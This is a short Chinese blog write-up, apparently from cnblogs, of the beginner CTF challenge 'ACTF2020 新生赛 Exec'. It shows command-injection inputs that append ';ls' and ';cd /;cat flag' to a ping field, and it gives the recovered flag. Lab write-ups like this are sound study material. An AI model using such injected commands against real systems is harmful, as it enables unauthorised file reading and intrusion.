[ACTF2020 新生赛]Exec 1
[ACTF2020 新生赛]Exec 1
下午写了这个,看了别人的解题过程,还是不太能理解。
题目有可能是sql注入,也可能是命令执行漏洞。
输入ping 127.0.0.1;ls
直接显示index.php
Linux系统显示网页的路径是/var/www/html,说明index.php在路径中
返回根目录看看是否有flag,127.0.0.1;cd /;ls
能看见flag在目录中
最后127.0.0.1;cd /;cat flag
得到flag{131b1282-4d92-49ca-af2b-b3393f9ccc29}
__EOF__
本文作者:胖竹孙
本文链接:https://www.cnblogs.com/getcha/p/16839190.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
本文链接:https://www.cnblogs.com/getcha/p/16839190.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)